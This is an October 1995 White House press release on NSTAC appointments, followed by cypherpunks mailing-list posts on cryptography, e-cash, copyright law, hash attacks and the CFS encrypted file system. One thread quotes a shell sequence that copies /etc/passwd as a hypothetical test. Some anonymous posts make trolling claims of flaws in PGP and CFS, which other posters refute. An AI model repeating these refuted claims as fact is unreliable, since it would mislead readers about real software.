From: The White House <Publications-Admin@WhiteHouse.Gov>
To: Public-Distribution@clinton.ai.mit.edu
Subject: 1995-10-27 Members Named to Nat Security Telecom Committee





                            THE WHITE HOUSE

                     Office of the Press Secretary

________________________________________________________________________
For Immediate Release                                   October 27, 1995


	     PRESIDENT NAMES MEMBERS TO THE NATIONAL SECURITY 
	       TELECOMMUNICATIONS ADVISORY COMMITTEE (NSTAC) 

     President Clinton today announced his intent to appoint the following
individuals to the National Security Telecommunications Advisory Committee
(NSTAC):

     Dr. Vance D. Coffman is the president of Lockheed Martin Corporation.
Previously, he was president of the Space Systems Division of Lockheed
Missiles and Space Co. and vice president of the corporation.  Dr. Coffman
was responsible for the Hubble Space Telescope, MILSTAR, Follow-on Early
Warning, and the worldwide mobile commercial cellular phone system,
Iridium.  He holds a B.S. degree in aerospace engineering from Iowa State
University, and masters and doctoral degrees in aeronautics and
astronautics from Stanford University.

     Mr. Paul E. Wright is chairman of Chrysler Technologies Corporation
(CTC), the aerospace and defense electronics arm of the Chrysler
Corporation.  He was president and chief operating officer of Fairchild
Industries prior to joining CTC.  Mr. Wright guided the company's focus
toward spacecraft, defense electronics, and selected industrial products.
Mr. Wright spent 28 years with RCA Corporation, during which time he rose
to senior vice president.  He was responsible for developing and
administrating the strategic plans for RCA.
     Van B. Honeycutt is president of Computer Sciences Corporation (CSC),
the largest independent provider of information technology consulting,
systems integration, and outsourcing to industry and government.  He began
his career with CSC in 1975, serving as a regional marketing manager for
Infonet, the company's timesharing and value-added network, which CSC sold
in 1989.  In 1983, Mr. Honeycutt became president of CSC Credit Services.
He was later promoted to corporate vice president and president of CSC's
Industry Services Group in 1987.  He led CSC's advance into the growing
outsourcing market, negotiating the industry's largest outsourcing pact, a
10 year, $3 billion agreement with General Dynamics Corporation.

     The President's National Security Telecommunications Advisory
Committee (NSTAC) provides the President with information and advice from
the industry's perspective regarding specific measures to maintain,
protect, and enhance the nation's telecommunications resources that
support national security and emergency preparedness capabilities.  The
Committee addresses telecommunications issues throughout the year and
periodically reports directly to the President, and also to the Secretary
of Defense in his capacity as the Executive Agent for the National
Communications System.


-30-30-30-












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: someone <zxmjn11@here.or.there>
Date: Sat, 28 Oct 1995 09:47:24 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951023022123.9641C-100000@eskimo.com>
Message-ID: <Pine.HPP.3.91.951028021729.17430B-100000@hp24.zdv.uni-tuebingen.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

i am using a prog called twinsock to have an internet connection via my 
shell account. The program provides a winsock for my windows progs and it 
comes with the complete source. When I first started to use it, I thought 
that it must be fairly easy to add some packet encryption to this 
program. But then I realized that it wouldnt work over a tcp/ip 
connection, only over a telephone line. But maybe the twinsock code might 
be a good starting point for some encrypting winsock. Unfortunately, I am 
not a good enough programmer to estimate how much work it is to come up 
with such an enhanced winsock or even start to make one myself.

Stephan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "User A." <usura@utopia.hacktic.nl>
Date: Sat, 28 Oct 1995 10:09:18 +0800
To: cypherpunks@toad.com
Subject: Re: Need Mail-to-News gates
Message-ID: <199510280149.CAA06177@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


You sez:
: On Fri, 27 Oct 1995 bluebird@alpha.c2.org wrote:

: > Could someone PLEASE netmail me some _known reliable_ gates that use the
: > straight netmail address format (alt.whatnot@bosco.kollege.edu)?

: If someone will direct me to sources, I'll try and setup a gate. (We use 
: INN).

'ftp.hacktic.nl/pub/replay/remailer/mail2news.shar

-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sat, 28 Oct 1995 21:15:38 +0800
To: cypherpunks@toad.com
Subject: Re: Diffie-Hellman Key Generation
In-Reply-To: <Pine.3.89.9510271616.A410-0100000@unicorn.com>
Message-ID: <199510281301.GAA12933@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Finally, I'm basing this on comments in 'Applied Cryptography' that D-H
> keys should be at least 512 bits and preferably 1024. How does the
> difficulty of breaking a D-H exchange with a 512 bit key compare to
> breaking a 512 bit RSA key ?

Calculating discrete logarithms is a bit more difficult than factoring.
So a 512-bit DH modulus will give you somewhat more security than a 512-bit
RSA key.  I'm not sure how much, probably not a lot.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 29 Oct 1995 02:05:55 +0800
To: cman@communities.com (Douglas Barnes)
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <v02120d08acb716a45144@[199.2.22.120]>
Message-ID: <199510281748.KAA11693@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>
>>you apparently didn't notice but there were some other posts on this
>>list about writing down the random seed that a person used to generate
>>the cash, and then being able to restore the cash somehow based on knowing
>>the random seed, however privacy is sacrified in this case apparently.
>>this with the Chaumian implementation, from what I understood.
>>
>
>I would not say that privacy is "sacrificed" if, in fact, Digicash
>has implemeneted this "write down the original random seed" backup
>method. Worst case scenario -- you write down the seed, and when the
>police break down your door, they find that you've written it down.

point well taken, but I thought the original poster stated that one
had to reveal the blinding factors to the bank, which I interpreted
as "sacrificing" anonymity.

frankly, I didn't understand that whole procedure and that's why I
asked someone to go into detail about this very important aspect
of the cash beyond the 3 liners or so I have seen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Sun, 29 Oct 1995 02:23:10 +0800
To: BELL@odo.law.udayton.edu (Tom Bell)
Subject: Re: S. 1284 To Amend (C) Act
In-Reply-To: <14ADF0902256@odo.law.udayton.edu>
Message-ID: <199510281800.LAA07028@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> The 9/28/95 Congression Report states that Senators Hatch and Leahy
> have introduced a bill to amend the Copyright Act in accord with the
> suggestions of the recent White Paper on the National Information
> Infrastructure.  In relevant part, S. 1284: 1) makes transmission of
> copies a type of publication (and thus potentially a means of
> infringing a copyright); and 2) prohibits the importation,
> manufacture, or distribution of any device the primary purpose of
> which is to deactivate any technological protections that prevent or
> inhibit the violation of copyrights.
> 
> Though I can imagine cypherpunks objecting to the first of these two 
> provisions, I'm especially interested in how you regard the 
> second.

Its a mad mad mad mad mad world. I'd better order my cable descrambler
ahead of time.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 29 Oct 1995 02:26:39 +0800
To: Paul Koning               1695 <pkoning@chipcom.com>
Subject: Re: Linux security issues
Message-ID: <199510281804.LAA14320@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Actually keeping the pass phrase out of swap space is fairly easy (although
>>I havn't looked at the PGP code to see if it actually does this).
>>...
>>However, the pass phrase is not the only dangerous information.
>>...
>>N.B. This problem affects all virtual memory operation systems.
>
>Not all of them.  In at least one (VMS) you can pin pages in physical 
>memory,

Good point.  Too bad the invocations of pinning aren't portable.  Maybe in
the next POSIX.

>Actually, any OS that does I/O directly to user pages has that capability in 
>the kernel...

All the OSs I am familar with pin the pages only for the duration of the
I/O operation.  After the I/O has completed, the page can be swapped out. 
What you really need is to pin the page in memory (with an implicit
contract with your OS that it won't be written to swap space while it is
pinned), put the sensitive information in the page, use the information,
wipe the information, and un-pin the page.

I wonder if NSA has built a virus to collect PGP keys?

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tom Bell" <BELL@odo.law.udayton.edu>
Date: Sat, 28 Oct 1995 23:58:08 +0800
To: cypherpunks@toad.com
Subject: S. 1284 To Amend (C) Act
Message-ID: <14ADF0902256@odo.law.udayton.edu>
MIME-Version: 1.0
Content-Type: text/plain


The 9/28/95 Congression Report states that Senators Hatch and Leahy 
have introduced a bill to amend the Copyright Act in accord with the 
suggestions of the recent White Paper on the National Information 
Infrastructure.  In relevant part, S. 1284:  1) makes transmission of copies a 
type of publication (and thus potentially a means of infringing a 
copyright); and 2) prohibits the importation, manufacture, or 
distribution of any device the primary purpose of which is to 
deactivate any technological protections that prevent or inhibit the 
violation of copyrights.

Though I can imagine cypherpunks objecting to the first of these two 
provisions, I'm especially interested in how you regard the 
second.  Imagine that Microsoft devised a program to prevent 
unauthorized copying of its software, and that you (perhaps in 
response to another of Sameer's contests!) wrote a program to 
counteract it.  It looks as the proposed law would forbid your 
counter-programming.  Bob would thus find it easier to sell defective 
copyright protection devices.

I'm thinking of writing an article about the White Paper and S. 1284, 
arguing that cypherpunks render a valuable public service in finding 
gaps in copyright protection, and that they therefore ought not be 
forbidden from pursuing their research.  I invite you to email me privately if 
you have a strong opinion about the proposed changes to the Copyright 
Act. I've attached a copy of the proposed s1201 below.

In a related vein, Senators Leahy and Feingold have introduced S. 
1122, which criminalizes willful infringements that do not have the
purpose of commercial gain.  This aims to close a percieved loophole 
under the current law, by which LaMacchia was able to distribute
copyrighted works.

S. 1284,  s1201:  "No person shall import, manufacture or distribute 
any device, product, or component incorporated into a device or 
product, or offer or perform any service, the primary purpose or 
effect of which is to avoid, bypass, remove, deactivate, or otherwise 
circumvent, without the authority of the copyright owner or the law, 
any process, treatement, mechanism or system which prevents or 
inhibits the violation of any of the exclusive rights of the 
copyright owner under section 106."

Tom W. Bell
Assistant Professor 
Law and Technology Program
UD Law School
bell@odo.law.udayton.edu

PGP fingerprint:
78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Oct 1995 03:15:32 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: 50 attacks... [NOISE]
Message-ID: <199510281848.LAA04943@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 AM 10/20/95 -0700, tomw@engr.sgi.com wrote:
>To date, MD5 appears to be a secure hash.  If you manage to find a way
>to reverse it, please let us all know.

There are a couple of analytically known collisions, and a birthday attack
can generate more after a mere 2**64 tries or so; for some applications, 
this can be a problem (e.g. a if a collision between real input and
random-trash input can let you get the system to do something unexpected
by handing it the random-trash input.)

Also, you can easily MD5-hash a dictionary of a billion wimpy passphrases
to let you catch people who use wimpy passphrases, and similarly hash
a dictionary of a billion reasonably-probable plaintexts for applications
that have reasonably-probable plaintexts that leave the hashes in plain view
(e.g. checksums for messages like "send $X to account Y"); this kind of
attack works for any hash, including cryptographically strong hashes,
as long as the system being attacked lets you crack it by reversing a hash
and doesn't use salt in its hashes.


>Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
>we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com

But Washington not doing anything is *good* :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Oct 1995 03:15:19 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: digital cash and identity disclosure
Message-ID: <199510281848.LAA05019@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 AM 10/20/95 -0700, tomw@cthulhu.engr.sgi.com wrote:
>> I don't understand how this could happen? The two coins are identical
>> (as I understood it from the tech backgound of ecash). what has a double-
>> spended coin what a copied single-spended coin not has?

>The process of spending a coin is not simply that of transfering data.
>There is a complicated protocol in which Alice decrypts some of the
>identity information in the coin.  

There are several approaches - in the immediate-clearing model,
you can tell if someone's spent coin 111111111111 because the bank keeps
a record of which coins have been spent and refuses to pay anybody
who tries to spend the same coin later; this almost forces you to use
on-line clearing solutions.  Chaum's blinding protocols
make it possible for the bank to sign a coin without being able to
trace it to the person withdrawing the coin, so she can spend it anonymously.

Another model uses the protocols Tom described which place a random chunk
of the spender's identity into the coin - one chunk gives away no information,
but two chunks have an extremely high probability of doing so - so you
can go prosecute the guilty double-spender later (or just debit her account
twice...)
Then there are the non-anonymous models.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@prufrocks.scranton.com>
Date: Sun, 29 Oct 1995 00:14:01 +0800
To: cypherpunks@toad.com
Subject: Returned mail: warning: cannot send message for 4 hours (fwd)
Message-ID: <Pine.LNX.3.91.951028115811.1708A-110000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Fri, 27 Oct 1995 19:45:02 -0400
From: Mail Delivery Subsystem <MAILER-DAEMON@prufrocks.scranton.com>
To: moroni@prufrocks.scranton.com
Subject: Returned mail: warning: cannot send message for 4 hours

    **********************************************
    **      THIS IS A WARNING MESSAGE ONLY      **
    **  YOU DO NOT NEED TO RESEND YOUR MESSAGE  **
    **********************************************

The original message was received at Fri, 27 Oct 1995 15:38:29 -0400
from moroni@localhost

   ----- The following addresses had delivery problems -----
majordormo@toad.com.uc.edu  (transient failure)

   ----- Transcript of session follows -----
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old

   ----- Original message follows -----


To: majordormo@toad.com.uc.edu
From: Moroni <moroni@prufrocks.scranton.com>
Date: Fri, 27 Oct 1995 15:38:27 -0400 (EDT)

subscribe Cypherpunks Deirdre A. Greene





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 29 Oct 1995 05:19:34 +0800
To: cypherpunks@toad.com
Subject: Re: Electric Communities (was: COS_sec)
Message-ID: <199510282005.NAA25047@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d04acb6f56280f0@[199.2.22.120]>
cman@communities.com (Douglas Barnes) wrote:
>
>FWIW, this is the company I work for. Not a bad article; more
>info is available at: http://www.communities.com/. Three of
>the nine people who work here are long-time subscribers to this
>list... I was recruited at a c'punks Bay Area meeting.
>
>--doug "member of the cryptographic staff" barnes
>
>>      Electric Communities began work began in 1993 on the
>>      Cyberspace Operating System, or COS, designed to manage
>>      the resources of shared computing -- like security and
>>      bandwidth -- just as operating systems like the
>>      Macintosh OS or Windows 95 manage resources inside a
>>      desktop PC. The team is inventing some technology,
>>      including a programming language (compatible with Sun
>>      Microsystems' new Java language for Internet
>>      applications) and a design concept for software building
>>      blocks which it is in the process of patenting. In
>>      addition, staff cryptographers are weaving encryption
>>      throughout the system to make it absolutely secure and
>>      private.
>>
>>
>>   COS_sec  (6 kb)
>
>

Great! Just what we need! java wannabees!

Ripoffs of secondrate, insecure software by thirdrate people!

Hey Dougie, "invented" any viruses lately?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 29 Oct 1995 05:31:02 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
Message-ID: <199510282012.NAA25761@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510271954.PAA20647@universe.digex.net>
Scott Brickner <sjb@universe.digex.net> wrote:
>Matt Blaze writes:
>>CFS pushes encryption services into the Unix(tm) file system.  It
>>supports secure storage at the system level through a standard Unix
>>file system interface to encrypted files.  Users associate a
>>cryptographic key with the directories they wish to protect.  Files in
>>these directories (as well as their pathname components) are
>>transparently encrypted and decrypted with the specified key without
>>further user intervention; cleartext is never stored on a disk or sent
>>to a remote file server.  CFS employs a novel combination of DES
>>stream and codebook cipher modes to provide high security with good
>>performance on a modern workstation.  CFS can use any available file
>>system for its underlying storage without modification, including
>>remote file servers such as NFS.  System management functions, such as
>>file backup, work in a normal manner and without knowledge of the key.
>
>What happens to hard links?
>
>mkdir foo bar
>CFS_set_directory_key -directory ./foo -key foo-key
>CFS_set_directory_key -directory ./bar -key bar-key
>cp /etc/passwd ./foo/test1
>ln ./foo/footest ./bar/bartest
>cmp ./foo/footest ./bar/bartest

This is a serious flaw. The emperor has no clothes. People should
sue at&t for this shit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 29 Oct 1995 05:50:18 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510282012.NAA25772@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <>
bal@martigny.ai.mit.edu wrote:
>   Date: Wed, 25 Oct 1995 09:08:15 -0700
>   X-Sender: tcmay@mail.got.net
>   Mime-Version: 1.0
>   Content-Type: text/plain; charset="us-ascii"
>   From: tcmay@got.net (Timothy C. May)
>   Sender: owner-cypherpunks@toad.com
>   Precedence: bulk
>
>   At 6:35 AM 10/25/95, Timothy C. May wrote:
>   >
>   >(* Hal Abelson of MIT says there are possible export problems with the MIT
>   >Press book on PGP, and MIT dropped plans for a version in a special OCR
>   >font. So, I agree that _some_ books cross the line and look like pure
>   >software. However, I continue to maintain that a badly-printed barcode is
>   >just a joke, nothing more.)
>
>   Brian LaMacchia sent me e-mail saying the MIT book _was_ published with the
>   OCR font as originally planned. No response to their CJR request, submitted
>   in Jan or Feb.
>
>[Blatant plug for MIT Press...]
>
>For reference, the title of the book is "PGP: Source Code and
>Internals", ISBN 0-262-24039-4, hardcover, $60.00.  There are links to
>the MIT Press pages from my keyserver home page
(http://www-swiss.ai.mit.edu/~bal/keyserver.html), or you can go to MIT
>Press's site (http://www-mitpress.mit.edu/) and look under
>Books/Computer Science.  Orders accepted over the net using either HTML
>forms (SSL) or e-mail (PGP).
>
>MIT Press is also selling "MIT PGP" T-Shirts, but I don't have pricing
>or size information on them yet.  They have the logo from the book cover
>on the front & back.  Front says "Mind your own business," back has a
>copy of MIT Press's PGP public key (in ASCII-armored form).
>
>					--bal

Its worth 60 buckx because the book has the old version without the
weakness in it. they are probably assuming that people will look at the
book instead of the ftp source code and then get lazy and complie the
code off the ftp instead of typing or scanning the book.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Sun, 29 Oct 1995 05:17:32 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510282018.NAA21600@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



kelso (kelso@netcom.com) suggested:
[Let's split the message, get both parts independently to the
end-recipient and let him sort it out]

Thomas Grant Edwards (tedwards@Glue.umd.edu) continued:
[Well, let's just get it there still encrypted]

I'll continue in this direction:

My understanding is that it is a Good Thing for the last stage remailer
to be able to claim:  "I received high entropy stuff. There is no way I
could tell what it was. I just forwarded it. I just make sure I do not
forward low entropy stuff."  Furthermore, it would help everybody if
end-recipients were somehow able to signal whether they are or are not
willing to read clearly anonymous material (and are suckers for
pseudonyms :-)

The problem is that it is currently the last stage's responsibility
to decipher most messages, and it is very difficult (at best) to go
back and modify all mail and news readers so their user can shield
himself from anonymous stuff.

We could however provide servers that make it "Very Easy" or at least
easier for the end-recipient to make sense of split or still encrypted
email messages:

(In broad lines, depending on the remailer type.)
The end-recipient may receive one encrypted message, or k split parts of
a message that say, prominently at the top (ni the message body so that
braindead mail readers show it to their users):

"If you are the end-recipient for this email message, you can get it
decrypted by forwarding it as is to a Handyserver such as
handyserver@well.known.site.  Don't worry about formats, the server
knows what to do. If you received several such messages, forward all of
them one by one or together. They may all be parts of one message. The
server remembers parts for a week, while waiting for more parts, and
will respond when done."

Now, we need a way for this to work for the end-recipient but not for
the last stage remailer. How about the message sender sending, through
the remailer network, to the Handyserver (How about Johnnyserv as an
other possible name :-), the decryption key, the end-recipient email
address and name, and the first few bytes of the encrypted messages.
The Handyserver authenticates service requests with some heuristic
based on name and email, and knows which key to apply based on the
message's first few bytes. That's extremely weak authentication but it
usually takes no effort by the end-recipient and the last stage
remailer can now say "I cannot attempt to get all my traffic through
Handyservers. Not only it would be very time consuming, but I would
have to illegally forge the recipient's address and the Handyserver
would forward the decrypted version directly to the end-recipient
anyway." The Handyserv can also keep a list of tokens publically posted
for the sender to be able to confirm whether his message was or was not
decrypted (that's an acknowledgement for a successful transmission
through the remailer system, too.)

In summary, the Handyserver provides a "mild" function: Its logs could
permit the identification of the last stage remailer, but so what, the
end-recipient had this info already. The last stage remailer now is
safer.  And the end-recipient has to choose and voluntarily get the
message decrypted.

That could take care of email. Maybe something similar is possible for
news (more or less the way rot13 worked, way back then, in the good old
times when it was deemed sufficient to protect sensitivities.)

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Sun, 29 Oct 1995 06:11:06 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <199510282012.NAA25772@infinity.c2.org>
Message-ID: <9510282131.AA11388@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 28 Oct 1995 13:12:08 -0700 (PDT)
   X-Authentication-Warning: infinity.c2.org: remail set sender to nobody using -f
   From: Anonymous User <nobody@c2.org>
   Complaints-To: remailer-owner <remail-owner@c2.org>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   >For reference, the title of the book is "PGP: Source Code and
   >Internals", ISBN 0-262-24039-4, hardcover, $60.00.  There are links to
   >the MIT Press pages from my keyserver home page
   (http://www-swiss.ai.mit.edu/~bal/keyserver.html), or you can go to MIT
   >Press's site (http://www-mitpress.mit.edu/) and look under
   >Books/Computer Science.  Orders accepted over the net using either HTML
   >forms (SSL) or e-mail (PGP).

   Its worth 60 buckx because the book has the old version without the
   weakness in it. they are probably assuming that people will look at the
   book instead of the ftp source code and then get lazy and complie the
   code off the ftp instead of typing or scanning the book.

This is blatently false and an obvious troll.  The book contains a copy
of the source code for MIT PGP 2.6.2, the same version currently being
distributed by MIT.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 29 Oct 1995 08:07:10 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510282012.NAA25761@infinity.c2.org>
Message-ID: <199510282357.XAA09892@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:
> >
> >What happens to hard links?
> >
> >mkdir foo bar
> >CFS_set_directory_key -directory ./foo -key foo-key
> >CFS_set_directory_key -directory ./bar -key bar-key
> >cp /etc/passwd ./foo/test1
> >ln ./foo/footest ./bar/bartest
> >cmp ./foo/footest ./bar/bartest
> 
> This is a serious flaw. The emperor has no clothes. People should
> sue at&t for this shit.

I'm not sure why I'm bothering to respond to this, but I'd hate to
think someone might take the above message seriously and think that
there's some kind of "serious flaw" in CFS demonstrated by this sequence
of (hypothetical, incorrect) commands.  So here goes:

What on earth are you talking about?

As I pointed out in a previous message, that's not how CFS works - you
can't link across encrypted directories.

There may be (and probably are) bugs in or attacks against CFS, but this
isn't one of them.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 29 Oct 1995 08:36:02 +0800
To: cypherpunks@toad.com
Subject: Re: MD4-derived hash functions
Message-ID: <199510290023.UAA12614@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510261603.AA26221@zorch.w3.org>,  <hallam@w3.org> wrote:
> 
> 3DES with only two independent keys is only slightly more secure than
> DES, consider a variant of the meet in the middle attack exploiting 
> the fact that the constraint network is reductible to two equations
> in one unknown.
> 

Huh?  Are you sure you're not thinking of 2DES?

2DES is known to be not much more secure than DES: 2DES can be broken
with 2^56 operations and 2^56 space.  (The space requirements can be
eliminated without too much extra cost in time.)

Could you post a reference for your claim that 2-key 3DES is insecure?
Or post an attack?  Or anything?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJLJdSoZzwIn1bdtAQFFRQGAgPceMs6vYCq4nGQQ5QT9tOLIgiGAoY8M
B71KIQDP75TMiF1rgvorSWQsNZjzjhbm
=3bH5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 29 Oct 1995 08:46:40 +0800
To: cypherpunks@toad.com
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510270413.VAA29718@ix7.ix.netcom.com>
Message-ID: <199510290028.UAA12628@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510270413.VAA29718@ix7.ix.netcom.com>,
John Lull <lull@acm.org> wrote:
> 
> Even for 2DES, or for 3-key 3DES, doesn't a meet in the middle attack
> require on the order of 2^56 words of memory?
> 

Actually, as it turns out, van Oorschot & Wiener have a recent paper
which describes how to break 2DES without the huge space requirements
without sacrificing too much time (by using their parallel collision
search method).  They estimated the cost to break 2DES via specialized
hardware, and decided that breaking 2DES was only about 2^14 times as
costly as breaking DES.

The conclusion to take away from this is simple: double encryption
doesn't give you much extra security over single encryption.  Don't
use double encryption.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJLKmSoZzwIn1bdtAQEk5gF/VtAgBNgB6o8SrTWSSMaciikdzoVCIqYF
JdXxs4pWt6ueY8WVsSEj5yU5EKAT0/4M
=6YNF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 29 Oct 1995 08:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <199510290031.UAA12653@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510272049.NAA29753@netcom7.netcom.com>,
Vladimir Z. Nuri <vznuri@netcom.com> wrote:
> 
> if this is true, I wanted to point out in my post that this is a property
> that real cash does not have. you cannot ever say to your bank from which
> you withdrew cash, "oops, I lost a piece, could you replace it? also, if
> someone spends the piece that I lost, tell them they can't?"
       [...]
> or, the bank might say, "oh, well, that cash was not spent yet. we can issue
> a replacement and bar the cash from being spent". this idea of "replacing"
> cash is of course unique to the electronic realm. if the bank does it,
> the consumer would be required to notify the bank before the cash is 
> spent, again another unusual property unique to e-cash.
> 

Hrmm, is this really unique to e-cash?  It sounds pretty similar to
traveller's checks.

(I do like your suggestion that e-cash service providers should write
a FAQ listing all the properties of their ``cash''!)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMJLLRCoZzwIn1bdtAQE2cwGAzWzY/2tqwjLpMSEr210r607j5mxUskJT
3L8qyQOCTMLjrZWfAwmQZ28yAszojBm+
=23AU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 29 Oct 1995 10:53:48 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510282012.NAA25761@infinity.c2.org>
Message-ID: <46upi0$53c@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous User <nobody@c2.org> writes:

>This is a serious flaw. The emperor has no clothes. People should
>sue at&t for this shit.

This is one of those times that I don't see much use for anonymity...
-- 
` . . . I'm a sysadmin, with an admitted preference for things I can
reboot over things I have to negotiate with . . . '
		Mike Shaver (shaver@neon.ingenia.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 29 Oct 1995 16:03:19 +0800
To: cypherpunks@toad.com
Subject: Conference in Eugene, OR - 11/3 and 11/4
Message-ID: <199510290728.AA06911@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

One of the professors at the U of Oregon School of Law here in Eugene,
Keith Aoki, has put together what looks like a pretty good conference.
As far as I can tell, it's going to be something of a sleeper - lots of
good speakers, and probably not very many people in the audience who'll
be able to appreciate what they're seeing. Folks on the west coast 
interested in law and technology policy might do well to pop up to Eugene
for the weekend.

I've got limited floor space for people who need a place to crash and 
don't want to pony up the $ for a place in Eugene. (I'm in Springfield,
the redneck town across I-5 from Eugene - I'm about 15 mins from campus
by car, and can give folks a ride over if they're willing to stay for
the day.) Motel rooms ought to run between $30 and $80 per night in
Eugene, depending on whether or not knife marks on the headboard and the
smell of old cigarettes bothers you. :) 

Eugene is 2 hours (~ 110 miles) south of Portland on I-5 and 8 or 9
hours north of the Bay Area by car, up I-5. There's an airport here, so
it's possible to fly in - some rocket scientist planners put the airport
way north and west of anything interesting in town, though. 

The conference is Friday, November 3, and Saturday, November 4. Speakers
include (in no special order): 

John Perry Barlow
James Boyle
Rosemary Coombe
Steven Winter
Rudy Rucker
Tim Sloan
A. Michael Froomkin
Marc Rotenberg
Lee Tien
